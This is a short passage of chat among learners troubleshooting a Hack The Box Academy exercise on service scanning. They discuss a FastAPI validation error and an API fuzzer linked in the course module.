I get stuff like "{"detail":[{"type":"int_parsing","loc":["path","item_id"],"msg":"Input should be a valid integer, unable to parse string as an integer","input":"v1"}]}"
fathom pendant
I get stuff like "{"detail":[{"type":"int_parsing","loc":["path","item_id"],"msg...
Well you're looking at the wrong place then
Are you using the api fuzzer the module linked?
cedar zinc
I tried it already... Its showing this error
I tried "python3" its showing same error
daring nebula
guyes what is ip ddress
spark monolith
<@638436013596999691> Figure this out; what are the module and section titles?
nah i left it cause something came up. Its the crack into hack the box path: service scanning